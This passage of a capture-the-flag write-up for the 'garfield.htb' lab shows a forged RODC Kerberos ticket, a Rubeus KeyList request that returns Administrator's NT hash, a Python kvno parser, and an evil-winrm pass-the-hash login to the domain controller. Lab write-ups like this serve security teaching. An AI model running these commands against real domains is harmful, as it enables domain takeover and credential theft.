[*] Forged a TGT for 'Administrator@garfield.htb'
[*] AuthTime : 4/11/2026 3:52:46 PM
[*] StartTime : 4/11/2026 3:52:46 PM
[*] EndTime : 4/12/2026 1:52:46 AM
[*] RenewTill : 4/18/2026 3:52:46 PM
[*] base64(ticket.kirbi):
doIFkjCCBY6gAwIBBaEDAgEWooIEfzCCBHthggR3MIIEc6ADAgEFoQ4bDEdBUkZJRUxELkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZ2FyZmllbGQuaHRio4IENzCCBDOgAwIBEqEGAgQgNQAAooIEIgSCBB7iXrmkcsN7YRJctEtvDdjDZv1A0VNBibXG2e0was90d5bBqWk9BYSJ/gF1uHgFp96UKBY8tVWBhuJKbrjsLqYexZwOpoIqaalv0HxR/ULvg9p/x4ySRhfFnQ+CIjhTjHFNyKUlFpGG4L5Ay/Pmvt75c2dUfYakigfTo90alK1c6aNykbMRGOTy5/M3WWER3b8Sq2jowdPPkopAhP4znS88IyJNsxI1E/ys4uCGbcLUS+brgUEfpF0jTx4apS2LTcZl0sY8eeZYGfvmblULaFO4bnPOLAJHVJ0WiM2e3OGaqph2ZqzVVimDRvayUZfJbD84DlqiUtjqkgLwExy+dORQw/X+Cv1+2xWkJB7ZHb4PUaxGCvoNTtGm4BVM+uiNgUSzX/Mg3XwtheUyhbHhEKgA2W3ivK86qTA7/mhmEbcds+l/my7LFs32oaorayZEIXgxVljRGbiL9SN0gelMjv2sVxDN/90LERcA40smvjcq1gUGycgWa527A+4Hk84P8v18wGcbpQg79ukL4Voua6+eLHuMYFD5ywoZObMDOp5WZeuL3Lb2bLgFzr9w52G7Af6RIC71jnmhSi7BMuW5pyXzfkJBe5kK785SX7TeFeAjJjQ+lNDfk1yjeTpctGgbUwjaoxI4b5Lvd4TZtcT40OQK4Q0OurmL2ZTdkYsjpQomsJIQYR2NuwRPBwv04yQLCXDMzvZNJ3ju3QsRHJgcx6scZqfnDFtm8qzrWl+QENpuEbhgNwBdnPr0QNkIO4l7vctpimGECqxGQ7KeYIAEVHVWjZIGtwl/TUh/BAJmhr3+3Ose6l0C0nWgN6u5Vb7dmvjLpbYEU8fCHOVLZutDiz5VrdIFGXlkvMyW4kHNHNTL0XHQhn1AOllGlR63DExo6ze70SSWLJ7mCZQ2aPaK8bhKLjlpI2+f8Zye23zDa6vjSkK1vglzK/3Rys8qUPhykdeQxc1upzSw9I1jipFMigryOBI5ZKTdgJ4TZh9Q50ATYOQIlBROSbamhc9jwRgsS/6/Ve/+PPlEg4u3B8CZ4D488b+u70arpWuakvhBYjXLeX92KMaZEtkR9JKSI/laL0vXdPyh7FvhzLIjigOdIqD64t3AOxj7BNsUb6yq8+NbsosSwcazUbmohLUmxG4jf1krJW9xnQhmhFI2vekIm0v1Lau9dhhxkZ/mXOlOG38qokXKZPkj3pHtgaTbDUIXEb2Zve6A1TnMCuBKCcBw+QAP2nFQteIrQPZ2yHGJud1fBdiiDa4RSBR1n09PuBeaF0fz995PNx8V57U6S9VygGNuoS08b/jIrIN7TnZDdBfmOEUobP0p8Rl66BhK61bEDScVbYTIP+WRAmWYM5+mKmhzKIe75DA+NBJn/oGf2O+IkSKj+ZP2ZWtDBX/p3Z6po4H+MIH7oAMCAQCigfMEgfB9ge0wgeqggecwgeQwgeGgKzApoAMCARKhIgQgpoGUjIfYvaDg8B+1aYY1rdnjnLVypN7sZvrPI9JeHLGhDhsMR0FSRklFTEQuSFRCohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQIEAAKQRGA8yMDI2MDQxMTIyNTI0NlqlERgPMjAyNjA0MTEyMjUyNDZaphEYDzIwMjYwNDEyMDg1MjQ2WqcRGA8yMDI2MDQxODIyNTI0NlqoDhsMR0FSRklFTEQuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxnYXJmaWVsZC5odGI=
[*] Ticket written to administrator_2026_04_11_22_52_46_Administrator_to_krbtgt@GARFIELD.HTB.kirbi
10) Request TGS for DC & Authenticate as Administrator
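Before sending the forged TGT anywhere, it is worth checking why /rodcNumber matters. Per MS-KILE, the kvno in a ticket's enc-part is a 32-bit value whose upper 16 bits name the RODC (krbtgt_8245 -> 0x2035) and whose lower 16 bits are the key version, and the KDC uses it to pick the krbtgt key it validates the ticket with. The Python below is an added example, not Rubeus code: a minimal DER walker that extracts that kvno from a base64 KRB-CRED (.kirbi) and splits it. PAGE_TGT_PREFIX holds the leading 111 bytes of the TGT Rubeus printed above (truncated, but far enough to reach the kvno; the bytes 02 04 20 35 00 00 are visible there), and sample_kirbi() builds a structurally identical KRB-CRED with a dummy cipher so the round trip can be checked offline.

```python
import base64

# DER tags used in a KRB-CRED (RFC 4120); all tag numbers are < 31, so every tag is one byte
APP_KRB_CRED = 0x76   # [APPLICATION 22] KRB-CRED
APP_TICKET = 0x61     # [APPLICATION 1] Ticket
SEQUENCE = 0x30
INTEGER = 0x02
GENERAL_STRING = 0x1b
OCTET_STRING = 0x04

# First 111 bytes of the Rubeus-forged TGT shown above (truncated after the kvno INTEGER)
PAGE_TGT_PREFIX = ("doIFkjCCBY6gAwIBBaEDAgEWooIEfzCCBHthggR3MIIEc6ADAgEFoQ4bDEdBUkZJRUxELkhUQqIh"
                   "MB+gAwIBAqEYMBYbBmtyYnRndBsMZ2FyZmllbGQuaHRio4IENzCCBDOgAwIBEqEGAgQgNQAA")


def ctx(n: int) -> int:
    """Context-specific constructed tag [n]."""
    return 0xA0 | n


def der(tag: int, content: bytes) -> bytes:
    """Encode one DER TLV with a definite length."""
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + content


def der_int(v: int) -> bytes:
    nbytes = max(1, (v.bit_length() + 8) // 8)  # extra leading byte keeps the value positive
    return der(INTEGER, v.to_bytes(nbytes, "big"))


def read_tlv(buf: bytes, pos: int):
    """Return (tag, value_start, value_end) for the TLV at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, pos, pos + length


def find(buf: bytes, start: int, end: int, tag: int):
    """Locate the first child TLV with the given tag inside buf[start:end]."""
    pos = start
    while pos < end:
        t, vs, ve = read_tlv(buf, pos)
        if t == tag:
            return vs, ve
        pos = ve
    raise ValueError("tag 0x%02x not found" % tag)


def ticket_kvno(kirbi_b64: str) -> int:
    """enc-part.kvno of the first Ticket inside a base64 KRB-CRED."""
    buf = base64.b64decode(kirbi_b64)
    tag, vs, ve = read_tlv(buf, 0)
    if tag != APP_KRB_CRED:
        raise ValueError("not a KRB-CRED")
    s, e = find(buf, vs, ve, SEQUENCE)            # KRB-CRED ::= SEQUENCE
    s, e = find(buf, s, e, ctx(2))                # [2] tickets
    s, e = find(buf, s, e, SEQUENCE)              # SEQUENCE OF Ticket
    s, e = find(buf, s, e, APP_TICKET)            # first Ticket
    s, e = find(buf, s, e, SEQUENCE)
    s, e = find(buf, s, e, ctx(3))                # [3] enc-part
    s, e = find(buf, s, e, SEQUENCE)              # EncryptedData
    s, e = find(buf, s, e, ctx(1))                # [1] kvno
    _, i_s, i_e = read_tlv(buf, s)
    return int.from_bytes(buf[i_s:i_e], "big")


def split_rodc_kvno(kvno: int):
    """MS-KILE: upper 16 bits = RODC number (krbtgt_<n>), lower 16 bits = key version."""
    return kvno >> 16, kvno & 0xFFFF


def rodc_of_ticket(kirbi_b64: str):
    return split_rodc_kvno(ticket_kvno(kirbi_b64))


def sample_kirbi(rodc_number: int, key_version: int = 0) -> str:
    """Constructed KRB-CRED with the field layout Rubeus emits; the cipher is a dummy, not a real ticket."""
    kvno = (rodc_number << 16) | key_version
    sname = der(SEQUENCE, der(ctx(0), der_int(2)) + der(ctx(1), der(SEQUENCE,
                der(GENERAL_STRING, b"krbtgt") + der(GENERAL_STRING, b"garfield.htb"))))
    enc_part = der(SEQUENCE, der(ctx(0), der_int(18))                    # etype aes256-cts-hmac-sha1-96
                   + der(ctx(1), der_int(kvno))                           # kvno
                   + der(ctx(2), der(OCTET_STRING, b"\x00" * 16)))        # dummy cipher
    ticket = der(APP_TICKET, der(SEQUENCE, der(ctx(0), der_int(5))
                 + der(ctx(1), der(GENERAL_STRING, b"GARFIELD.HTB"))
                 + der(ctx(2), sname) + der(ctx(3), enc_part)))
    enc_cred = der(SEQUENCE, der(ctx(0), der_int(0)) + der(ctx(2), der(OCTET_STRING, b"")))
    cred = der(SEQUENCE, der(ctx(0), der_int(5)) + der(ctx(1), der_int(22))
               + der(ctx(2), der(SEQUENCE, ticket)) + der(ctx(3), enc_cred))
    return base64.b64encode(der(APP_KRB_CRED, cred)).decode()


if __name__ == "__main__":
    print("page TGT: rodc number %d, key version %d" % rodc_of_ticket(PAGE_TGT_PREFIX))
```

The same split explains the defensive angle: a TGT whose kvno names an RODC but that asks for the keys of an account outside that RODC's reveal-on-demand list (or inside its never-reveal list) is exactly what a KeyList abuse looks like on the writable DC, and it is why the PRP changes in step 8 were necessary before this request.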
With the forged TGT in hand, I sent a KeyList TGS-REQ to the writable DC with Rubeus asktgs /keyList. The request carries a KERB-KEY-LIST-REQ padata asking krbtgt/GARFIELD.HTB for the user's long-term keys, the mechanism an RODC itself uses to fetch secrets it is allowed to cache. DC01 validates the TGT with krbtgt_8245's key and, because Administrator is now in RODC01's reveal-on-demand list and no longer denied, returns the account's NT hash in the reply:
*Evil-WinRM* PS C:\Users\Administrator.GARFIELD\Documents> ./Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/Garfield.htb /dc:dc01.garfield.htb /ticket:doIFkjCCBY6gAwIBBaEDAgEWooIEfzCCBHthggR3MIIEc6ADAgEFoQ4bDEdBUkZJRUxELkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZ2FyZmllbGQuaHRio4IENzCCBDOgAwIBEqEGAgQgNQAAooIEIgSCBB6wYzn83b93Yjf6RlQaOADVrbH6LHjXmVTG/7Xn+r6jIbG+8hEkPs0P5EgBebc73NyTStEdA6vgjgfG7P8JVMGuCD10lhFW140YUHQN+Ymc8iHOWTVhQHQqId3HQ8iaEv2tLr51WS3fiuqm8ACY1zSKaNkO5lawSxZZ57UF864xAqLZUZG3bzxKLmk97PGoGKrEgzoOZ82b+BAcivToQ0tLbW2Wv/xaDxCDQ503TzMjoS2CaGSJGLyG9i6nR+q4DUJL3g2ZvKKw/l7olJWveOv8RIilSKQW8L859B/5u4Q9u6F8VcYzB7V7kEZ/q2lQ1dG/ea4jjKSgjOx1ahfhNRvcZQ2VzGpvPSgfIcKspLZPSH0Zi94egFMrXB2/xAKIGmof8QEBOGE/cW3qTliTPuEXiPyZ0TGO0vDyYhmuXiDDDQtbGT0AR/jqL0JN2i+KLjir++DWg0WoEyTf0cH+90/j+Co20iv+ljMJwTAYjP8laJEbNPuketBRfAT783gRLPVEJQ1uFvgcK7jlKgNANwuY2s88JarD5HKdcaKSmqCA7Y5ZEB+hMvuP97mVEX5UeqAmCfHpdtqo6fPrchKMrL+Ombgr8/UUs+ndsq6ldnEJeEQrYw93of65C7cGVJxFbTjxj/xdRqX+HPCi7I1WNSYw3zxgiqSpqqumq88DzYCRzD7z/O9dH/1oyviH8FlCc/k908BQcwcRw7izDtOmF87KXMPACwijIQmTx4dqHznAuq5JAwV+yaJFhX+LRgNuoc7XNZJboXwg0tNqt2aJDYlGuZr6tt7AdrSytbF6bO+4KfI4KhdArE4RdgyqsL2/3Kht/K1IfZWaPithLD2vgK3fuiYOCJVe8CSvpdKhN22qmAmNNTvx3BJ3UHR+CFf9tmlcg5zwm9CijnMLPqWuHZZfWwdonPzAywCrU6mtga04n3zYCp44mCeOsuadl0SRyxxCJ2zh7VyW6J7D2s/Mt851dp738P6doClbZhrALe5D7cF8Ji3wKgvcd5kfEuSbn3SsUdv+bPq9i5UsX24NCfhOnwP3xNTkrJzk1bnnZKF0mD5MZRkAiXPl4ift1ry7yOtolKYGL7fK1Ro+4/2GX+JjWt0T/VGsyyh7T1GSq9jHFJu/e2oGTUFme7npEB6ia1oiQWmQgFTdi+z5IxgavgM/9Tug/KoJwo/0cZCD+sZVZttVJr43eKsiXfCOhNPOooekDkc/nfMG9wmY4HcFNUWi1Ic9C075YXbyazaumX7QJ2dfI8X4Hf/7IEa8c5R6Bm2GtR+E1a4hZVEF7dZ3VTLPlXWp8sllGf3A5S4zIVadP5ZxikCvJinCW2w9EbOvF4jSVLTdfBxROkuvwt0dGRAB2N23tfyKM9/ELloqcqXRuDltjmDfPrkFliA0K828o4H+MIH7oAMCAQCigfMEgfB9ge0wgeqggecwgeQwgeGgKzApoAMCARKhIgQgbRkot+QXK+whtSqz/GKv4NXOp9PuFouuMVUAkgWhw2ahDhsMR0FSRklFTEQuSFRCohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQIEAAKQRGA8yMDI2MDQxMTIyMDYzMlqlERgPMjAyNjA0MTEyMjA2MzJaphEYDzIwMjYwNDEyMDgwNjMyWqcRGA8yMDI2MDQxODIyMDYzMlqoDhsMR0FSRklFTEQuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxnYXJmaWVsZC5odGI=
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGS
[*] Requesting 'aes256_cts_hmac_sha1' etype for the service ticket
[*] Building KeyList TGS-REQ request for: 'Administrator'
[*] Using domain controller: dc01.garfield.htb (192.168.100.1)
[+] TGS request successful!
[*] base64(ticket.kirbi):
doIFnjCCBZqgAwIBBaEDAgEWooIEsTCCBK1hggSpMIIEpaADAgEFoQ4bDEdBUkZJRUxELkhUQqIhMB+g
AwIBAqEYMBYbBmtyYnRndBsMR0FSRklFTEQuSFRCo4IEaTCCBGWgAwIBEqEDAgECooIEVwSCBFP0icFY
EIh3LqzKDDTs8cd99HTPUcMtkulav8wxwgW8psJxy7ONONCr1LIqUsmWGKsLaMrA9Q7dEdVHmfEJ1YUQ
09pH1b1YzV5KTCK8KuC8ndhoaKJb62nzOmzK+TbVjUeAowMH7AtlP/c+MdOhIgv0ETTEnS6Y5r8YUHBs
+mYBGAuE0X3pYoBIFeB7hTHnSYj4eK9vFeR2gqGlS5hhGosEUeX0AhRSXz6codm8kggL7D5rZqYnqIqk
rha4xc0/QI/eo05REZ6YUJNrttaoz77ha6azx3c8N0KSebZtHEQS/luVR2YxkDT2CE/ldUlCOp6I7UTO
Lt52j8mSn0emoRu4IZ1Lm2FnVxh0vbeI/yYWIYOFR6dvURBLQMvcdyrbXCJjbBlpg3l6VGG60LM7K8LJ
ZpEtedom/gk8AOetypDqIMebs+FfqmEzO9jAbSA3zIEslPnpXsQCFg1Bqz74jdDuy1Y3ySw4iosD7QoL
yIdxhhb1Mgo6FW+kF0qBSXhhmm4TFHTkMZTijtTGb3KWjCUpA994qu+nZKVpcMnFnkZQZhM6Sm4aLpLo
p2WNRv/8xZQkm5s1wY8kb917iO2j2FRIYlYj+QlM404Db5OhVbo4p2gp3AI5XabDRmKk6J99Q6njMxuy
GJPPqVC/0Zx0WrCO2T6vvV7ZnacI2zGyrffS1Xsv2pMCZUp0S8NHY/GAa0Fs/2N8GP23q7SscGVPICT8
4rZ74FqU2fCGStiQ8OMqGJJwWFsI7rdr2hPuqqJL0e2sUr5TiufcMR2ubNiEiAw1/1n86HnfGK7nBLDc
l5BZ/ScxYvlJAf/oPmg/bVzHzK1ytNypNNUhlldkXa3VgNHELqNtOH7+1gDfLUgwKSt3fXzDwjgsSgfS
KMJKPkYC4kqdLMFw0o403fRhSMvXpMMYKc/IstzszP0vfwpvkNL+hLpo+ysMgT6ACKgMYgMqvTrskhxy
5r4L2/iuUnOBZlOjaooNq+7e73uF0Y39lovCdbNmzDm0+uUSOHfVl72vkpHVFUfSmjH+FpDYgd+3uGaS
uBriqRynCU/7RQJmQ6YAnNHCF+Arx/cSt+HK5QK9AD2sQsqCkRaAe2/Dd8GHr1GiFxu8SFZdC1kOAAlO
sDuHk+b4zLUDlCktMJ7cESBrTl0Q+f3zL+TjBOJ7xINlz1aN9FY/d9Ifieqz5Lu/rEVWM2BzxkhSR6zD
lA01BNQPdHtJFBz3G4nipp7rTryQ0Nw3rBfzVk3cfNGXF5gzMm71rajBj/f2S7/uCPuQyHE6qBos813n
/qAWl64Ks3OAaqa3gT40wiKKD1aYMuOFD4NvH1yRspQSQhRY7PceMVlSywpWgK7D49NiIy/WRVxyFDjx
yQdjy8HnX8CSzqRC8/vXdp3LWaQgP60mYokJogng3v2pwl1LNhy/vBlM6dKuxlPpUwGHL3Uf9LgRN1Wz
YSwn0PEy+zRJaRcUZrST0fxS5FzX9MqjgdgwgdWgAwIBAKKBzQSByn2BxzCBxKCBwTCBvjCBu6ArMCmg
AwIBEqEiBCDqNECWceL/K/NCWGr3jgK5d3PYVp8BLt1RUf+ZaqRtraEOGwxHQVJGSUVMRC5IVEKiGjAY
oAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQAAAQAApREYDzIwMjYwNDExMjI1MzE2WqYRGA8yMDI2
MDQxMjA4MDYzMlqoDhsMR0FSRklFTEQuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxHQVJGSUVMRC5I
VEI=
ServiceName : krbtgt/GARFIELD.HTB
ServiceRealm : GARFIELD.HTB
UserName : Administrator (NT_PRINCIPAL)
UserRealm : GARFIELD.HTB
StartTime : 4/11/2026 3:53:16 PM
EndTime : 4/12/2026 1:06:32 AM
RenewTill : 1/1/0001 12:00:00 AM
Flags : name_canonicalize
KeyType : aes256_cts_hmac_sha1
Base64(key) : 6jRAlnHi/yvzQlhq944CuXdz2FafAS7dUVH/mWqkba0=
Password Hash : EE238F6DEBC752010428F20875B092D5
11) Access DC01 and Grab Root Flag
The "Password Hash" in the KeyList reply is Administrator's NT hash, so no cracking is needed: I used evil-winrm with pass-the-hash (-H) to open an administrative session on DC01 and read the root flag:
┌──(global_venv)─(w_11㉿kali)-[~/…/htb/garfield/solution/realnewtest]
└─$ evil-winrm -i dc01.garfield.htb -u Administrator -H 'EE238F6DEBC752010428F20875B092D5'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/13/2026 5:16 PM Scripts
d----- 8/16/2025 4:26 PM VMs
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/11/2026 1:01 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop>